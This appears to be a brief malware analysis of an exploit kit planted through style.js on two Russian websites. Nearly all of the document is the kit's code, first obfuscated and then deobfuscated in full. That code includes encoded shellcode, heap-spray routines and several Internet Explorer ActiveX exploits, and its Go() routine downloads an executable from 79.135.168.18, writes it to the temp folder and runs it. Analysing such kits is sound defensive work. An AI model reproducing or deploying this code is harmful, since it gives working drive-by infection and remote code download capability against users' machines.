www.wmpd.ru/style.js and www.mtno.ru/style.js

Style.js embeds an iframe to http://79.135.168.18
The index.html page of the iframe contains another obfuscation method.
Content of index.html:
<html><body><object id=xmltarget classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5"></object><div id='pdfplace'></div><div style="display:none;" id="ipitpnNoyEI">vj7'+'MpNIq0Gv'+'OUCdosbw9BH'+'mRpNI'+'q0bcq4HmPQMw'+'9QqI'+'M2j7M'+'gQ_r'+'ttmqBNdrQCu9tfxo'+'kBvPB'+'OW'+'M2j7M'+'gQ_rt'+'iuqXHyitiw'+'9XH@v4'+'Gv'+
[snip]
'+'jb</div><script>function iUgeFWr3jPzcx(XXWiRBF){return String["f"+"rom"+"Ch"+"ar"+"Code"](XXWiRBF);}</script><script>function r3afWyrBdHK7(Ts4xlLlk){var IX1VaGCz5Ty=0,wlle40xMFiPpN=Ts4xlLlk.length,mE8RVSYLmRPkC=1024,Hx8Jitym4w,OeY93Tw,dNn4v9qMXa="",U7WQQFJ=IX1VaGCz5Ty,zMLAf=IX1VaGCz5Ty,jn3CjJn87q4F=IX1VaGCz5Ty,nnHz7NVWn=Array(63,52,21,18,61,48,56,17,54,30,0,0,0,0,0,0,3,10,57,9,24,16,62,33,49,38,14,36,31,5,37,29,26,53,13,46,32,51,50,34,43,45,59,0,0,0,0,39,0,44,1,35,7,11,4,42,25,8,20,40,12,6,41,15,58,28,27,47,60,55,22,23,2,19,0);for(OeY93Tw=Math.ceil(wlle40xMFiPpN/mE8RVSYLmRPkC);OeY93Tw>IX1VaGCz5Ty;OeY93Tw--){for(eval("Hx8Jitym4w=M"+"a"+"th."+"m"+"in(wlle40xMFiPpN,mE8RVSYLmRPkC)");Hx8Jitym4w>IX1VaGCz5Ty;Hx8Jitym4w--,wlle40xMFiPpN--){jn3CjJn87q4F|=(nnHz7NVWn[Ts4xlLlk.charCodeAt(U7WQQFJ++)-48])<<zMLAf;if(zMLAf){dNn4v9qMXa+=iUgeFWr3jPzcx(28^jn3CjJn87q4F&255);jn3CjJn87q4F>>=8;zMLAf-=2;}else{zMLAf=6;}}}return (dNn4v9qMXa);}var uCmCYwsXffarP=document.getElementById('ipitpnNoyEI').innerHTML.replace("'+'","");for(var ah=0;ah<(uCmCYwsXffarP.length);ah++){uCmCYwsXffarP=uCmCYwsXffarP.replace("'+'","");}eval(r3afWyrBdHK7(uCmCYwsXffarP));</script></body></html>

The malicious script is now embedded within the <div> tag.

A quick analysis, with a few replacements in the code, yields the plain code:

function sleep(func,naptime){
var sleeping = true;
var now = new Date();
var alarm;
var startingMSeconds = now.getTime();
while(sleeping){
alarm = new Date();
alarmMSeconds = alarm.getTime();
if (alarmMSeconds - startingMSeconds > naptime){ sleeping = false; }
}
eval(func);
}

var m=new Array();
var mf=0;
var url="http://79.135.168.18/load.php?id=62288";

function hex(num,width){
var digits="0123456789ABCDEF";
var hex=digits.substr(num&0xF,1);
while(num>0xF){
num=num>>>4;
hex=digits.substr(num&0xF,1)+hex;
}
var width=(width?width:0);
while(hex.length<width)hex="0"+hex;
return hex;
}

function addr(addr){
return unescape("%u"+hex(addr&0xFFFF,4)+"%u"+hex((addr>>16)&0xFFFF,4));
}

function unes(str){
var tmp="";
for(var i=0;i<str.length;i+=4){
tmp+=addr((str.charCodeAt(i+3)<<24)+
(str.charCodeAt(i+2)<<16)+
(str.charCodeAt(i+1)<<8)+
str.charCodeAt(i));
}
return unescape(tmp);
}

function hav(){
mf=mf;
setTimeout("hav()",1000);
}

function gss(ss,sss){
while(ss.length*2<sss)ss+=ss;
ss=ss.substring(0,sss/2);
return ss;
}

function ms(xpl){
var plc=unes(
"\x43\x43\x43\x43\x43\x43\xEB\x0F\x5B\x33\xC9\x66\xB9\x80\x01\x80"+
"\x33\xEF\x43\xE2\xFA\xEB\x05\xE8\xEC\xFF\xFF\xFF\x7F\x8B\x4E\xDF"+
"\xEF\xEF\xEF\x64\xAF\xE3\x64\x9F\xF3\x42\x64\x9F\xE7\x6E\x03\xEF"+
"\xEB\xEF\xEF\x64\x03\xB9\x87\x61\xA1\xE1\x03\x07\x11\xEF\xEF\xEF"+
"\x66\xAA\xEB\xB9\x87\x77\x11\x65\xE1\x07\x1F\xEF\xEF\xEF\x66\xAA"+
"\xE7\xB9\x87\xCA\x5F\x10\x2D\x07\x0D\xEF\xEF\xEF\x66\xAA\xE3\xB9"+
"\x87\x00\x21\x0F\x8F\x07\x3B\xEF\xEF\xEF\x66\xAA\xFF\xB9\x87\x2E"+
"\x96\x0A\x57\x07\x29\xEF\xEF\xEF\x66\xAA\xFB\xAF\x6F\xD7\x2C\x9A"+
"\x15\x66\xAA\xF7\x06\xE8\xEE\xEF\xEF\xB1\x66\x9A\xCB\x64\xAA\xEB"+
"\x85\xEE\xB6\x64\xBA\xF7\xB9\x07\x64\xEF\xEF\xEF\xBF\x87\xD9\xF5"+
"\xC0\x9F\x07\x78\xEF\xEF\xEF\x66\xAA\xF3\x64\x2A\x6C\x2F\xBF\x66"+
"\xAA\xCF\x87\x10\xEF\xEF\xEF\xBF\x64\xAA\xFB\x85\xED\xB6\x64\xBA"+
"\xF7\x07\x8E\xEF\xEF\xEF\xEC\xAA\xCF\x28\xEF\xB3\x91\xC1\x8A\x28"+
"\xAF\xEB\x97\x8A\xEF\xEF\x10\x9A\xCF\x64\xAA\xE3\x85\xEE\xB6\x64"+
"\xBA\xF7\x07\xAF\xEF\xEF\xEF\x85\xE8\xB7\xEC\xAA\xCB\xDC\x34\xBC"+
"\xBC\x10\x9A\xCF\xBF\xBC\x64\xAA\xF3\x85\xEA\xB6\x64\xBA\xF7\x07"+
"\xCC\xEF\xEF\xEF\x85\xEF\x10\x9A\xCF\x64\xAA\xE7\x85\xED\xB6\x64"+
"\xBA\xF7\x07\xFF\xEF\xEF\xEF\x85\x10\x64\xAA\xFF\x85\xEE\xB6\x64"+
"\xBA\xF7\x07\xEF\xEF\xEF\xEF\xAE\xB4\xBD\xEC\x0E\xEC\x0E\xEC\x0E"+
"\xEC\x0E\x6C\x03\xEB\xB5\xBC\x64\x35\x0D\x18\xBD\x10\x0F\xBA\x64"+
"\x03\x64\x92\xE7\x64\xB2\xE3\xB9\x64\x9C\xD3\x64\x9B\xF1\x97\xEC"+
"\x1C\xB9\x64\x99\xCF\xEC\x1C\xDC\x26\xA6\xAE\x42\xEC\x2C\xB9\xDC"+
"\x19\xE0\x51\xFF\xD5\x1D\x9B\xE7\x2E\x21\xE2\xEC\x1D\xAF\x04\x1E"+
"\xD4\x11\xB1\x9A\x0A\xB5\x64\x04\x64\xB5\xCB\xEC\x32\x89\x64\xE3"+
"\xA4\x64\xB5\xF3\xEC\x32\x64\xEB\x64\xEC\x2A\xB1\xB2\x2D\xE7\xEF"+
"\x07\x1B\x11\x10\x10\xBA\xBD\xA3\xA2\xA0\xA1\xEF"+url+xpl);
var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
if (mf){
for (i=0;i<hb;i++)delete m[i];
CollectGarbage();
}
for(i=0;i<hb;i++)m[i]=ss+plc;
if(!mf){
mf=1;
hav();
}
return 0;
}

function cobj(obj){
var ret=null;
if(obj.substring(0,1)=="{"){
try{
var clsid=obj.substring(1,obj.length-1);
ret=document.createElement("object");
ret.setAttribute("classid","clsid:"+clsid);
return ret;
}catch(e){
return null;
}
}else{
try{
ret=new ActiveXObject(obj);
return ret;
}catch(e){
return null;
}
}
}

var padding = "AAAA";
var heapBase = 0x00150000;
var memo;

function init(maxAlloc){
while (4 + padding.length*2 + 2 < 65535)padding += padding;
memo = new Array();
flush();
}

function flush(){
delete memo["plunger"];
CollectGarbage();
memo["plunger"] = new Array();
var bytes = new Array(32, 64, 256, 32768);
for (var i = 0; i < 6; i++) {
for(var n = 0; n < 4; n++) {
var len = memo["plunger"].length;
eval("memo[\"plunger\"][len] = padding.substr(0, (" + bytes[n] + "-6)/2);");
}
}
}

function alloc(arg, tag){
var size;
size = arg;
if (size == 32 || size == 64 || size == 256 || size == 32768) {}
if ( ! memo[tag] )memo[tag] = new Array();
var len = memo[tag].length;
memo[tag][len] = padding.substr(0, (arg-6)/2);
}

function alloc_str(arg, tag){
var size;
size = 4 + arg.length*2 + 2;
if (size == 32 || size == 64 || size == 256 || size == 32768) {}
if ( ! memo[tag])memo[tag] = new Array();
var len = memo[tag].length;
memo[tag][len] = arg.substr(0, arg.length);
}

function free(tag) {
delete memo[tag];
CollectGarbage();
flush();
}

function CreateO(o,n){
var r=null;
try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,"")}catch(e){}}
if(!r){try{r=o.CreateObject(n,"","")}catch(e){}}
if(!r){try{r=o.GetObject("",n)}catch(e){}}
if(!r){try{r=o.GetObject(n,"")}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return(r);
}

function Go(a){
var eurl=url+"&spl=7";
var fname="winNOFZCyliz5mmRR.exe";
var fso=a.CreateObject("Scripting.FileSystemObject","")
var sap=CreateO(a,"Shell.Application");
var x=CreateO(a,"ADODB.Stream");
var nl=null;
fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
x.Mode=3;
try{nl=CreateO(a,"Micr"+"osoft.XMLH"+"TTP");nl.open("GET",eurl,false);}
catch(e){try{nl=CreateO(a,"MSXML2.XMLHTTP");nl.open("GET",eurl,false);}
catch(e){try{nl=CreateO(a,"MSXML2.ServerXMLHTTP");nl.open("GET",eurl,false);}
catch(e){try{nl=new XMLHttpRequest();nl.open("GET",eurl,false);}
catch(e){return 0;}}}}
x.Type=1;
nl.send(null);
rb=nl.responseBody;
x.Open();
x.Write(rb);
x.SaveTofile(fname,2);
sap.ShellExecute(fname);
return 1;
}

function attack(s){
var obj=null;

if(s==1){
var i=0;
var target=new Array("BD96C556-65A3-11D0-983A-00C04FC29E36","BD96C556-65A3-11D0-983A-00C04FC29E30","AB9BCEDD-EC7E-47E1-9322-D4A210617116","0006F033-0000-0000-C000-000000000046","0006F03A-0000-0000-C000-000000000046","6e32070a-766d-4ee6-879c-dc1fa91d2fc3","6414512B-B978-451D-A0D8-FCFDF33E833C","7F5B7F63-F06F-4331-8A26-339E03C0AE3D","06723E09-F4C2-43c8-8358-09FCD1DB0766","639F725F-1B2D-4831-A9FD-874847682010","BA018599-1DB3-44f9-83B4-461454C84BF8","D0C07D56-7C69-43F1-B4A0-25F5A11FAB19","E8CCCDDF-CA28-496b-B050-6C07C962476B",null);
while(target[i]){
var a=null;
a=document.createElement("object");
a.setAttribute("classid","clsid:"+target[i]);
if(a){try{var b=CreateO(a,"Shell.Application");if(b){Go(a);}}catch(e){}}
i++;
}
sleep("attack(4);",4000);
return 0;
}

if(s==3){
try{
obj=cobj("WebViewFolderIcon.WebViewFolderIcon.1");
if(obj){
ms("&spl=8");
for(var i=0;i<128;i++){
var wvfio=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
try{wvfio.setSlice(0x7ffffffe,0,0,202116108);}catch(e){}
var wvfit=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
}
sleep("attack(7);",2000);
return 0;
}
}catch(e){}
sleep("attack(7);",1);
return 0;
}

if(s==4){
try{
obj=cobj("{EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F}");
if(obj){
ms("&spl=9");
z=Math.ceil(0x0c0c0c0c);
z=document.scripts[0].createControlRange().length;
sleep("attack(3);",2000);
return 0;
}
}catch(e){}
sleep("attack(3);",1);
return 0;
}

if(s==7){
try{
obj=cobj("{77829F14-D911-40FF-A2F0-D11DB8D6D0BC}");
if(obj){
ms("&spl=10");
var buf = "";
while (buf.length < 5000) buf += "\x0c\x0c\x0c\x0c";
obj.SetFormatLikeSample(buf);
sleep("attack(9);",2000);
return 0;
}
}catch(e){}
sleep("attack(9);",1);
return 0;
}

if(s==9){
try{
obj=cobj("DirectAnimation.PathControl");
if(obj){
ms("&spl=11");
init();
var jmpecx = 0x0c0c0c0c;
var vtable = addr(0x7ceb9090);
for (var i = 0; i < 124/4; i++)vtable += addr(jmpecx);
vtable += padding.substr(0, (1008-138)/2);
var fakeObjPtr = heapBase + 0x688 + ((1008+8)/8)*48;
var fakeObjChunk = padding.substr(0, (0x200c-4)/2) + addr(fakeObjPtr) + padding.substr(0, 14/2);
CollectGarbage();
flush();
for (var i = 0; i < 100; i++)alloc_str(vtable);
alloc_str(vtable, "lookaside");
free("lookaside");
for (var i = 0; i < 100; i++)alloc(0x2010);
for (var i = 0; i < 2; i++) {
alloc_str(fakeObjChunk);
alloc_str(fakeObjChunk, "freeList");
}
alloc_str(fakeObjChunk);
free("freeList");
obj.KeyFrame(0x40000801, new Array(1), new Array(1));
sleep("attack(10);",2000);
return 0;
}
}catch(e){}
sleep("attack(10);",1);
return 0;
}
if(s==10){
snpac();
return 0;
}
}
function xml(){ }
attack(1);

function pdf(){
try {
var obj = null;
obj = new ActiveXObject("AcroPDF.PDF");
if (!obj) {obj = new ActiveXObject("PDF.PdfCtrl");}
if (obj) {document.getElementById("pdfplace").innerHTML = "<embed width='150' height='150' src='http://79.135.168.18/pdf.php?id=62288' type='application/pdf'></embed>";}
} catch(e) {
document.getElementById("pdfplace").innerHTML = "<embed width='150' height='150' src='http://79.135.168.18/pdf.php?id=62288' type='application/pdf'></embed>";
}
sleep("xml()", 3);
}

function snpac(){
var buf1 = 'http://79.135.168.18/load.php?id=62288&spl=4';
try{
var obj = document.createElement('object');
obj.setAttribute('classid', 'clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9');
obj.setAttribute("id", "obj");
obj.SnapshotPath = buf1;
obj.CompressedPath = 'C:\win32.exe';
obj.PrintSnapshot();
} catch(e) {}
sleep("pdf()", 1000);
}

The script is a collection of various exploits.
